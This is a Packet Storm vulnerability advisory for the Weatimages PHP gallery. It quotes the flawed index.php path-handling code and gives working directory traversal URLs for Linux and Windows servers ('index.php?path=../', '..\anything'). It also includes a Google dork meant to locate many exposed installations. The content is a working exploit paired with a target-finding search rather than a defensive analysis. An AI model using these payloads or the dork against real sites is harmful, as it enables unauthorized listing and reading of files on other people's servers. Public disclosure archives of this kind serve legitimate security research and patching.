Weatimages Directory Traversal / Local File Inclusion

2010-01-01T00:00:00
ID PACKETSTORM:84635
Type packetstorm
Reporter e.wiZz!
Modified 2010-01-01T00:00:00

Description

                                        
                                            `Weatimages Directory Traversal&Local File Include Vulnerabilities  
  
By: e.wiZz!  
  
  
############Script info:  
  
############Site: http://nazarkin.name/projects/weatimages/download.php  
  
  
  
In the wild...  
  
#######################################################  
  
  
#######index.php:  
  
...  
  
//kill oneself if user trying to access resource with '/../' in path  
if (strstr(urldecode($_SERVER['REQUEST_URI']), '/../')) { fatal_error('Suspicious query rejected'); }  
  
...  
  
if (!$REQUEST_PATH) {  
if ($_GET['path']) { //compatibility mode enabled and we have some path  
$REQUEST_PATH = $_GET['path'];  
$SERVER_PHP_SELF = $_SERVER['SCRIPT_NAME'] . '/' . $REQUEST_PATH . '/';  
}  
else { //we are in the root directory  
$REQUEST_PATH = '.';  
}  
}  
  
...  
  
...huh, did you know there are Windows servers?  
  
#####List files in directory you want(linux):  
  
http://inthewild/index.php?path=../  
http://inthewild/index.php?path=../..  
  
##### Windows?:  
  
http://inthewild/index.php?path=..\anything  
  
  
########Dork:  
http://www.google.ba/#hl=bs&q=%22Powered+by+Weatimages%22&start=20&sa=N&fp=73afe0b6734a45d2 (google says 200 000,i dont trust them)  
  
`